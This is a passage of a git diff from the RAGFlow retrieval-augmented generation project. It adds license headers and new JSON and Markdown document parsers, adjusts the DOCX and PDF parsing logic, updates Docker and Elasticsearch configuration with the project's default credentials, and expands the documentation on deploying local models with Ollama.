resource = "/session/%s/chromium/send_command_and_get_result" % driver.session_id
|
||||
url = driver.command_executor._url + resource
|
||||
body = json.dumps({"cmd": cmd, "params": params})
|
||||
response = driver.command_executor._request("POST", url, body)
|
||||
|
||||
if not response:
|
||||
raise Exception(response.get("value"))
|
||||
|
||||
return response.get("value")
|
||||
|
||||
|
||||
def __get_pdf_from_html(
|
||||
path: str,
|
||||
timeout: int,
|
||||
install_driver: bool,
|
||||
print_options: dict
|
||||
):
|
||||
webdriver_options = Options()
|
||||
webdriver_prefs = {}
|
||||
webdriver_options.add_argument("--headless")
|
||||
webdriver_options.add_argument("--disable-gpu")
|
||||
webdriver_options.add_argument("--no-sandbox")
|
||||
webdriver_options.add_argument("--disable-dev-shm-usage")
|
||||
webdriver_options.experimental_options["prefs"] = webdriver_prefs
|
||||
|
||||
webdriver_prefs["profile.default_content_settings"] = {"images": 2}
|
||||
|
||||
if install_driver:
|
||||
service = Service(ChromeDriverManager().install())
|
||||
driver = webdriver.Chrome(service=service, options=webdriver_options)
|
||||
else:
|
||||
driver = webdriver.Chrome(options=webdriver_options)
|
||||
|
||||
driver.get(path)
|
||||
|
||||
try:
|
||||
WebDriverWait(driver, timeout).until(
|
||||
staleness_of(driver.find_element(by=By.TAG_NAME, value="html"))
|
||||
)
|
||||
except TimeoutException:
|
||||
calculated_print_options = {
|
||||
"landscape": False,
|
||||
"displayHeaderFooter": False,
|
||||
"printBackground": True,
|
||||
"preferCSSPageSize": True,
|
||||
}
|
||||
calculated_print_options.update(print_options)
|
||||
result = __send_devtools(
|
||||
driver, "Page.printToPDF", calculated_print_options)
|
||||
driver.quit()
|
||||
return base64.b64decode(result["data"])
|
||||
|
||||
|
||||
def is_valid_url(url: str) -> bool:
|
||||
return bool(re.match(r"(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]", url))
|
||||
@ -15,6 +15,8 @@ minio:
|
||||
host: 'minio:9000'
|
||||
es:
|
||||
hosts: 'http://es01:9200'
|
||||
username: 'elastic'
|
||||
password: 'infini_rag_flow'
|
||||
redis:
|
||||
db: 1
|
||||
password: 'infini_rag_flow'
|
||||
|
||||
@ -1,7 +1,20 @@
|
||||
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from .pdf_parser import RAGFlowPdfParser as PdfParser, PlainParser
|
||||
from .docx_parser import RAGFlowDocxParser as DocxParser
|
||||
from .excel_parser import RAGFlowExcelParser as ExcelParser
|
||||
from .ppt_parser import RAGFlowPptParser as PptParser
|
||||
from .html_parser import RAGFlowHtmlParser as HtmlParser
|
||||
from .json_parser import RAGFlowJsonParser as JsonParser
|
||||
from .markdown_parser import RAGFlowMarkdownParser as MarkdownParser
|
||||
@ -1,4 +1,16 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from docx import Document
|
||||
import re
|
||||
import pandas as pd
|
||||
@ -101,19 +113,24 @@ class RAGFlowDocxParser:
|
||||
def __call__(self, fnm, from_page=0, to_page=100000):
|
||||
self.doc = Document(fnm) if isinstance(
|
||||
fnm, str) else Document(BytesIO(fnm))
|
||||
pn = 0
|
||||
secs = []
|
||||
pn = 0 # parsed page
|
||||
secs = [] # parsed contents
|
||||
for p in self.doc.paragraphs:
|
||||
if pn > to_page:
|
||||
break
|
||||
if from_page <= pn < to_page and p.text.strip():
|
||||
secs.append((p.text, p.style.name))
|
||||
|
||||
runs_within_single_paragraph = [] # save runs within the range of pages
|
||||
for run in p.runs:
|
||||
if 'lastRenderedPageBreak' in run._element.xml:
|
||||
pn += 1
|
||||
continue
|
||||
if 'w:br' in run._element.xml and 'type="page"' in run._element.xml:
|
||||
if pn > to_page:
|
||||
break
|
||||
if from_page <= pn < to_page and p.text.strip():
|
||||
runs_within_single_paragraph.append(run.text) # append run.text first
|
||||
|
||||
# wrap page break checker into a static method
|
||||
if RAGFlowDocxParser.has_page_break(run._element.xml):
|
||||
pn += 1
|
||||
|
||||
secs.append(("".join(runs_within_single_paragraph), p.style.name)) # then concat run.text as part of the paragraph
|
||||
|
||||
tbls = [self.__extract_table_content(tb) for tb in self.doc.tables]
|
||||
return secs, tbls
|
||||
|
||||
@ -1,4 +1,16 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from openpyxl import load_workbook
|
||||
import sys
|
||||
from io import BytesIO
|
||||
|
||||
116
deepdoc/parser/json_parser.py
Normal file
116
deepdoc/parser/json_parser.py
Normal file
@ -0,0 +1,116 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# The following documents are mainly referenced, and only adaptation modifications have been made
|
||||
# from https://github.com/langchain-ai/langchain/blob/master/libs/text-splitters/langchain_text_splitters/json.py
|
||||
|
||||
import json
|
||||
from typing import Any, Dict, List, Optional
|
||||
from rag.nlp import find_codec
|
||||
|
||||
class RAGFlowJsonParser:
|
||||
def __init__(
|
||||
self, max_chunk_size: int = 2000, min_chunk_size: Optional[int] = None
|
||||
):
|
||||
super().__init__()
|
||||
self.max_chunk_size = max_chunk_size * 2
|
||||
self.min_chunk_size = (
|
||||
min_chunk_size
|
||||
if min_chunk_size is not None
|
||||
else max(max_chunk_size - 200, 50)
|
||||
)
|
||||
|
||||
def __call__(self, binary):
|
||||
encoding = find_codec(binary)
|
||||
txt = binary.decode(encoding, errors="ignore")
|
||||
json_data = json.loads(txt)
|
||||
chunks = self.split_json(json_data, True)
|
||||
sections = [json.dumps(l, ensure_ascii=False) for l in chunks if l]
|
||||
return sections
|
||||
|
||||
@staticmethod
|
||||
def _json_size(data: Dict) -> int:
|
||||
"""Calculate the size of the serialized JSON object."""
|
||||
return len(json.dumps(data, ensure_ascii=False))
|
||||
|
||||
@staticmethod
|
||||
def _set_nested_dict(d: Dict, path: List[str], value: Any) -> None:
|
||||
"""Set a value in a nested dictionary based on the given path."""
|
||||
for key in path[:-1]:
|
||||
d = d.setdefault(key, {})
|
||||
d[path[-1]] = value
|
||||
|
||||
def _list_to_dict_preprocessing(self, data: Any) -> Any:
|
||||
if isinstance(data, dict):
|
||||
# Process each key-value pair in the dictionary
|
||||
return {k: self._list_to_dict_preprocessing(v) for k, v in data.items()}
|
||||
elif isinstance(data, list):
|
||||
# Convert the list to a dictionary with index-based keys
|
||||
return {
|
||||
str(i): self._list_to_dict_preprocessing(item)
|
||||
for i, item in enumerate(data)
|
||||
}
|
||||
else:
|
||||
# Base case: the item is neither a dict nor a list, so return it unchanged
|
||||
return data
|
||||
|
||||
def _json_split(
|
||||
self,
|
||||
data: Dict[str, Any],
|
||||
current_path: Optional[List[str]] = None,
|
||||
chunks: Optional[List[Dict]] = None,
|
||||
) -> List[Dict]:
|
||||
"""
|
||||
Split json into maximum size dictionaries while preserving structure.
|
||||
"""
|
||||
current_path = current_path or []
|
||||
chunks = chunks or [{}]
|
||||
if isinstance(data, dict):
|
||||
for key, value in data.items():
|
||||
new_path = current_path + [key]
|
||||
chunk_size = self._json_size(chunks[-1])
|
||||
size = self._json_size({key: value})
|
||||
remaining = self.max_chunk_size - chunk_size
|
||||
|
||||
if size < remaining:
|
||||
# Add item to current chunk
|
||||
self._set_nested_dict(chunks[-1], new_path, value)
|
||||
else:
|
||||
if chunk_size >= self.min_chunk_size:
|
||||
# Chunk is big enough, start a new chunk
|
||||
chunks.append({})
|
||||
|
||||
# Iterate
|
||||
self._json_split(value, new_path, chunks)
|
||||
else:
|
||||
# handle single item
|
||||
self._set_nested_dict(chunks[-1], current_path, data)
|
||||
return chunks
|
||||
|
||||
def split_json(
|
||||
self,
|
||||
json_data: Dict[str, Any],
|
||||
convert_lists: bool = False,
|
||||
) -> List[Dict]:
|
||||
"""Splits JSON into a list of JSON chunks"""
|
||||
|
||||
if convert_lists:
|
||||
chunks = self._json_split(self._list_to_dict_preprocessing(json_data))
|
||||
else:
|
||||
chunks = self._json_split(json_data)
|
||||
|
||||
# Remove the last chunk if it's empty
|
||||
if not chunks[-1]:
|
||||
chunks.pop()
|
||||
return chunks
|
||||
|
||||
def split_text(
|
||||
self,
|
||||
json_data: Dict[str, Any],
|
||||
convert_lists: bool = False,
|
||||
ensure_ascii: bool = True,
|
||||
) -> List[str]:
|
||||
"""Splits JSON into a list of JSON formatted strings"""
|
||||
|
||||
chunks = self.split_json(json_data=json_data, convert_lists=convert_lists)
|
||||
|
||||
# Convert to string
|
||||
return [json.dumps(chunk, ensure_ascii=ensure_ascii) for chunk in chunks]
|
||||
44
deepdoc/parser/markdown_parser.py
Normal file
44
deepdoc/parser/markdown_parser.py
Normal file
@ -0,0 +1,44 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
|
||||
class RAGFlowMarkdownParser:
|
||||
def __init__(self, chunk_token_num=128):
|
||||
self.chunk_token_num = int(chunk_token_num)
|
||||
|
||||
def extract_tables_and_remainder(self, markdown_text):
|
||||
# Standard Markdown table
|
||||
table_pattern = re.compile(
|
||||
r'''
|
||||
(?:\n|^)
|
||||
(?:\|.*?\|.*?\|.*?\n)
|
||||
(?:\|(?:\s*[:-]+[-| :]*\s*)\|.*?\n)
|
||||
(?:\|.*?\|.*?\|.*?\n)+
|
||||
''', re.VERBOSE)
|
||||
tables = table_pattern.findall(markdown_text)
|
||||
remainder = table_pattern.sub('', markdown_text)
|
||||
|
||||
# Borderless Markdown table
|
||||
no_border_table_pattern = re.compile(
|
||||
r'''
|
||||
(?:\n|^)
|
||||
(?:\S.*?\|.*?\n)
|
||||
(?:(?:\s*[:-]+[-| :]*\s*).*?\n)
|
||||
(?:\S.*?\|.*?\n)+
|
||||
''', re.VERBOSE)
|
||||
no_border_tables = no_border_table_pattern.findall(remainder)
|
||||
tables.extend(no_border_tables)
|
||||
remainder = no_border_table_pattern.sub('', remainder)
|
||||
|
||||
return remainder, tables
|
||||
@ -1,4 +1,16 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import os
|
||||
import random
|
||||
|
||||
@ -940,7 +952,7 @@ class RAGFlowPdfParser:
|
||||
fnm, str) else pdfplumber.open(BytesIO(fnm))
|
||||
self.page_images = [p.to_image(resolution=72 * zoomin).annotated for i, p in
|
||||
enumerate(self.pdf.pages[page_from:page_to])]
|
||||
self.page_chars = [[c for c in page.chars if self._has_color(c)] for page in
|
||||
self.page_chars = [[{**c, 'top': max(0, c['top'] - 10), 'bottom': max(0, c['bottom'] - 10)} for c in page.chars if self._has_color(c)] for page in
|
||||
self.pdf.pages[page_from:page_to]]
|
||||
self.total_page = len(self.pdf.pages)
|
||||
except Exception as e:
|
||||
@ -1009,6 +1021,8 @@ class RAGFlowPdfParser:
|
||||
|
||||
self.page_cum_height = np.cumsum(self.page_cum_height)
|
||||
assert len(self.page_cum_height) == len(self.page_images) + 1
|
||||
if len(self.boxes) == 0 and zoomin < 9: self.__images__(fnm, zoomin * 3, page_from,
|
||||
page_to, callback)
|
||||
|
||||
def __call__(self, fnm, need_image=True, zoomin=3, return_html=False):
|
||||
self.__images__(fnm, zoomin)
|
||||
|
||||
@ -10,6 +10,7 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from io import BytesIO
|
||||
from pptx import Presentation
|
||||
|
||||
|
||||
@ -1,3 +1,16 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import datetime
|
||||
|
||||
|
||||
|
||||
@ -1,3 +1,16 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import re,json,os
|
||||
import pandas as pd
|
||||
from rag.nlp import rag_tokenizer
|
||||
|
||||
@ -1,3 +1,16 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
TBL = {"94":"EMBA",
|
||||
"6":"MBA",
|
||||
"95":"MPA",
|
||||
|
||||
@ -1,3 +1,15 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
TBL = {"1":{"name":"IT/通信/电子","parent":"0"},
|
||||
"2":{"name":"互联网","parent":"0"},
|
||||
|
||||
@ -1,3 +1,16 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
TBL = {
|
||||
"2":{"name":"北京","parent":"1"},
|
||||
"3":{"name":"天津","parent":"1"},
|
||||
|
||||
@ -1,4 +1,16 @@
|
||||
# -*- coding: UTF-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import os, json,re,copy
|
||||
import pandas as pd
|
||||
current_file_path = os.path.dirname(os.path.abspath(__file__))
|
||||
|
||||
@ -1,4 +1,16 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import json
|
||||
from deepdoc.parser.resume.entities import degrees, regions, industries
|
||||
|
||||
|
||||
@ -1,4 +1,16 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import re, copy, time, datetime, demjson3, \
|
||||
traceback, signal
|
||||
import numpy as np
|
||||
|
||||
@ -1,3 +1,16 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import pdfplumber
|
||||
|
||||
from .ocr import OCR
|
||||
|
||||
@ -1,3 +1,16 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import copy
|
||||
import re
|
||||
import numpy as np
|
||||
|
||||
@ -1,12 +1,13 @@
|
||||
# Version of Elastic products
|
||||
STACK_VERSION=8.11.3
|
||||
|
||||
# Set the cluster name
|
||||
CLUSTER_NAME=rag_flow
|
||||
|
||||
# Port to expose Elasticsearch HTTP API to the host
|
||||
ES_PORT=1200
|
||||
|
||||
# Set the Elasticsearch password
|
||||
ELASTIC_PASSWORD=infini_rag_flow
|
||||
|
||||
# Port to expose Kibana to the host
|
||||
KIBANA_PORT=6601
|
||||
|
||||
@ -25,11 +26,12 @@ MINIO_PORT=9000
|
||||
MINIO_USER=rag_flow
|
||||
MINIO_PASSWORD=infini_rag_flow
|
||||
|
||||
REDIS_PORT=6379
|
||||
REDIS_PASSWORD=infini_rag_flow
|
||||
|
||||
SVR_HTTP_PORT=9380
|
||||
|
||||
RAGFLOW_VERSION=v0.7.0
|
||||
RAGFLOW_VERSION=dev
|
||||
|
||||
TIMEZONE='Asia/Shanghai'
|
||||
|
||||
|
||||
@ -24,6 +24,7 @@ services:
|
||||
environment:
|
||||
- TZ=${TIMEZONE}
|
||||
- HF_ENDPOINT=https://hf-mirror.com
|
||||
- MACOS=${MACOS}
|
||||
networks:
|
||||
- ragflow
|
||||
restart: always
|
||||
|
||||
@ -24,6 +24,7 @@ services:
|
||||
environment:
|
||||
- TZ=${TIMEZONE}
|
||||
- HF_ENDPOINT=https://hf-mirror.com
|
||||
- MACOS=${MACOS}
|
||||
networks:
|
||||
- ragflow
|
||||
restart: always
|
||||
|
||||
@ -8,12 +8,12 @@ services:
|
||||
- ${ES_PORT}:9200
|
||||
environment:
|
||||
- node.name=es01
|
||||
- cluster.name=${CLUSTER_NAME}
|
||||
- cluster.initial_master_nodes=es01
|
||||
- ELASTIC_PASSWORD=${ELASTIC_PASSWORD}
|
||||
- bootstrap.memory_lock=false
|
||||
- xpack.security.enabled=false
|
||||
- cluster.max_shards_per_node=4096
|
||||
- discovery.type=single-node
|
||||
- xpack.security.enabled=true
|
||||
- xpack.security.http.ssl.enabled=false
|
||||
- xpack.security.transport.ssl.enabled=false
|
||||
- TZ=${TIMEZONE}
|
||||
mem_limit: ${MEM_LIMIT}
|
||||
ulimits:
|
||||
@ -77,6 +77,8 @@ services:
|
||||
image: redis:7.2.4
|
||||
container_name: ragflow-redis
|
||||
command: redis-server --requirepass ${REDIS_PASSWORD} --maxmemory 128mb --maxmemory-policy allkeys-lru
|
||||
ports:
|
||||
- ${REDIS_PORT}:6379
|
||||
volumes:
|
||||
- redis_data:/data
|
||||
networks:
|
||||
|
||||
@ -24,6 +24,7 @@ services:
|
||||
environment:
|
||||
- TZ=${TIMEZONE}
|
||||
- HF_ENDPOINT=https://huggingface.co
|
||||
- MACOS=${MACOS}
|
||||
networks:
|
||||
- ragflow
|
||||
restart: always
|
||||
|
||||
@ -15,6 +15,8 @@ minio:
|
||||
host: 'minio:9000'
|
||||
es:
|
||||
hosts: 'http://es01:9200'
|
||||
username: 'elastic'
|
||||
password: 'infini_rag_flow'
|
||||
redis:
|
||||
db: 1
|
||||
password: 'infini_rag_flow'
|
||||
|
||||
@ -5,7 +5,7 @@ slug: /configure_knowledge_base
|
||||
|
||||
# Configure a knowledge base
|
||||
|
||||
Knowledge base, hallucination-free chat, and file management are three pillars of RAGFlow. RAGFlow's AI chats are based on knowledge bases. Each of RAGFlow's knowledge bases serves as a knowledge source, *parsing* files uploaded from your local machine and file references generated in **File Management** into the real 'knowledge' for future AI chats. This guide demonstrates some basic usages of the knowledge base feature, covering the following topics:
|
||||
Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. RAGFlow's AI chats are based on knowledge bases. Each of RAGFlow's knowledge bases serves as a knowledge source, *parsing* files uploaded from your local machine and file references generated in **File Management** into the real 'knowledge' for future AI chats. This guide demonstrates some basic usages of the knowledge base feature, covering the following topics:
|
||||
|
||||
- Create a knowledge base
|
||||
- Configure a knowledge base
|
||||
@ -124,7 +124,7 @@ RAGFlow uses multiple recall of both full-text search and vector search in its c
|
||||
|
||||
## Search for knowledge base
|
||||
|
||||
As of RAGFlow v0.7.0, the search feature is still in a rudimentary form, supporting only knowledge base search by name.
|
||||
As of RAGFlow v0.8.0, the search feature is still in a rudimentary form, supporting only knowledge base search by name.
|
||||
|
||||

|
||||
|
||||
|
||||
@ -5,71 +5,279 @@ slug: /deploy_local_llm
|
||||
|
||||
# Deploy a local LLM
|
||||
|
||||
RAGFlow supports deploying LLMs locally using Ollama or Xinference.
|
||||
RAGFlow supports deploying models locally using Ollama or Xinference. If you have locally deployed models to leverage or wish to enable GPU or CUDA for inference acceleration, you can bind Ollama or Xinference into RAGFlow and use either of them as a local "server" for interacting with your local models.
|
||||
|
||||
## Ollama
|
||||
RAGFlow seamlessly integrates with Ollama and Xinference, without the need for further environment configurations. You can use them to deploy two types of local models in RAGFlow: chat models and embedding models.
|
||||
|
||||
One-click deployment of local LLMs, that is [Ollama](https://github.com/ollama/ollama).
|
||||
:::tip NOTE
|
||||
This user guide does not intend to cover much of the installation or configuration details of Ollama or Xinference; its focus is on configurations inside RAGFlow. For the most current information, you may need to check out the official site of Ollama or Xinference.
|
||||
:::
|
||||
|
||||
### Install
|
||||
## Deploy a local model using Ollama
|
||||
|
||||
- [Ollama on Linux](https://github.com/ollama/ollama/blob/main/docs/linux.md)
|
||||
- [Ollama Windows Preview](https://github.com/ollama/ollama/blob/main/docs/windows.md)
|
||||
- [Docker](https://hub.docker.com/r/ollama/ollama)
|
||||
[Ollama](https://github.com/ollama/ollama) enables you to run open-source large language models that you deployed locally. It bundles model weights, configurations, and data into a single package, defined by a Modelfile, and optimizes setup and configurations, including GPU usage.
|
||||
|
||||
### Launch Ollama
|
||||
:::note
|
||||
- For information about downloading Ollama, see [here](https://github.com/ollama/ollama?tab=readme-ov-file#ollama).
|
||||
- For information about configuring Ollama server, see [here](https://github.com/ollama/ollama/blob/main/docs/faq.md#how-do-i-configure-ollama-server).
|
||||
- For a complete list of supported models and variants, see the [Ollama model library](https://ollama.com/library).
|
||||
:::
|
||||
|
||||
Decide which LLM you want to deploy ([here's a list for supported LLM](https://ollama.com/library)), say, **mistral**:
|
||||
To deploy a local model, e.g., **Llama3**, using Ollama:
|
||||
|
||||
### 1. Check firewall settings
|
||||
|
||||
Ensure that your host machine's firewall allows inbound connections on port 11434. For example:
|
||||
|
||||
```bash
|
||||
$ ollama run mistral
|
||||
sudo ufw allow 11434/tcp
|
||||
```
|
||||
Or,
|
||||
### 2. Ensure Ollama is accessible
|
||||
|
||||
Restart system and use curl or your web browser to check if the service URL of your Ollama service at `http://localhost:11434` is accessible.
|
||||
|
||||
```bash
|
||||
$ docker exec -it ollama ollama run mistral
|
||||
Ollama is running
|
||||
```
|
||||
|
||||
### Use Ollama in RAGFlow
|
||||
### 3. Run your local model
|
||||
|
||||
- Go to 'Settings > Model Providers > Models to be added > Ollama'.
|
||||
|
||||

|
||||
```bash
|
||||
ollama run llama3
|
||||
```
|
||||
<details>
|
||||
<summary>If your Ollama is installed through Docker, run the following instead:</summary>
|
||||
|
||||
> Base URL: Enter the base URL where the Ollama service is accessible, like, `http://<your-ollama-endpoint-domain>:11434`.
|
||||
```bash
|
||||
docker exec -it ollama ollama run llama3
|
||||
```
|
||||
</details>
|
||||
|
||||
- Use Ollama Models.
|
||||
### 4. Add Ollama
|
||||
|
||||

|
||||
In RAGFlow, click on your logo on the top right of the page **>** **Model Providers** and add Ollama to RAGFlow:
|
||||
|
||||
## Xinference
|
||||

|
||||
|
||||
Xorbits Inference([Xinference](https://github.com/xorbitsai/inference)) empowers you to unleash the full potential of cutting-edge AI models.
|
||||
|
||||
### Install
|
||||
### 5. Complete basic Ollama settings
|
||||
|
||||
- [pip install "xinference[all]"](https://inference.readthedocs.io/en/latest/getting_started/installation.html)
|
||||
- [Docker](https://inference.readthedocs.io/en/latest/getting_started/using_docker_image.html)
|
||||
In the popup window, complete basic settings for Ollama:
|
||||
|
||||
1. Because **llama3** is a chat model, choose **chat** as the model type.
|
||||
2. Ensure that the model name you enter here *precisely* matches the name of the local model you are running with Ollama.
|
||||
3. Ensure that the base URL you enter is accessible to RAGFlow.
|
||||
4. OPTIONAL: Switch on the toggle under **Does it support Vision?** if your model includes an image-to-text model.
|
||||
|
||||
:::caution NOTE
|
||||
- If your Ollama and RAGFlow run on the same machine, use `http://localhost:11434` as base URL.
|
||||
- If your Ollama and RAGFlow run on the same machine and Ollama is in Docker, use `http://host.docker.internal:11434` as base URL.
|
||||
- If your Ollama runs on a different machine from RAGFlow, use `http://<IP_OF_OLLAMA_MACHINE>:11434` as base URL.
|
||||
:::
|
||||
|
||||
:::danger WARNING
|
||||
If your Ollama runs on a different machine, you may also need to set the `OLLAMA_HOST` environment variable to `0.0.0.0` in **ollama.service** (Note that this is *NOT* the base URL):
|
||||
|
||||
```bash
|
||||
Environment="OLLAMA_HOST=0.0.0.0"
|
||||
```
|
||||
|
||||
See [this guide](https://github.com/ollama/ollama/blob/main/docs/faq.md#how-do-i-configure-ollama-server) for more information.
|
||||
:::
|
||||
|
||||
:::caution WARNING
|
||||
Improper base URL settings will trigger the following error:
|
||||
```bash
|
||||
Max retries exceeded with url: /api/chat (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0xffff98b81ff0>: Failed to establish a new connection: [Errno 111] Connection refused'))
|
||||
```
|
||||
:::
|
||||
|
||||
